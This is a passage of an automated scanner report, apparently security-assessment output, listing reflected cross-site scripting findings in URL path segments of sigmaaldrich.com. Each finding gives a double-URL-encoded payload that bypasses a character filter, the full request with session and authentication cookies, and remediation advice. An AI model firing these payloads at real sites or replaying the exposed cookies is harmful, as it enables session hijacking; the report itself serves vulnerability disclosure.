Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:14 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/labware/labware-catalogbc4ef";alert(1)//b1741c0c7a1","E404") ;
   </script>
...[SNIP]...

1.104. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/custom-oligos [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/custom-oligos

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed65a%2522%253balert%25281%2529%252f%252fc4bf42e1856 was submitted in the REST URL parameter 1. This input was echoed as ed65a";alert(1)//c4bf42e1856 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contented65a%2522%253balert%25281%2529%252f%252fc4bf42e1856/sigma-aldrich/areas-of-interest/life-science/custom-oligos HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:00 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contented65a";alert(1)//c4bf42e1856/sigma-aldrich/areas-of-interest/life-science/custom-oligos","E404") ;
   </script>
...[SNIP]...

1.105. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/custom-oligos [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/custom-oligos

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49565%2522%253balert%25281%2529%252f%252f76b01f700a7 was submitted in the REST URL parameter 2. This input was echoed as 49565";alert(1)//76b01f700a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich49565%2522%253balert%25281%2529%252f%252f76b01f700a7/areas-of-interest/life-science/custom-oligos HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:02 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich49565";alert(1)//76b01f700a7/areas-of-interest/life-science/custom-oligos","E404") ;
   </script>
...[SNIP]...

1.106. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/custom-oligos [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/custom-oligos

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcb63%2522%253balert%25281%2529%252f%252f821f33370a5 was submitted in the REST URL parameter 3. This input was echoed as fcb63";alert(1)//821f33370a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interestfcb63%2522%253balert%25281%2529%252f%252f821f33370a5/life-science/custom-oligos HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:04 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interestfcb63";alert(1)//821f33370a5/life-science/custom-oligos","E404") ;
   </script>
...[SNIP]...

1.107. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/custom-oligos [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/custom-oligos

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8080f%2522%253balert%25281%2529%252f%252f2611162ee43 was submitted in the REST URL parameter 4. This input was echoed as 8080f";alert(1)//2611162ee43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science8080f%2522%253balert%25281%2529%252f%252f2611162ee43/custom-oligos HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:06 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science8080f";alert(1)//2611162ee43/custom-oligos","E404") ;
   </script>
...[SNIP]...

1.108. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/custom-oligos [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/custom-oligos

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a731c%2522%253balert%25281%2529%252f%252fe03672b8d7c was submitted in the REST URL parameter 5. This input was echoed as a731c";alert(1)//e03672b8d7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/custom-oligosa731c%2522%253balert%25281%2529%252f%252fe03672b8d7c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
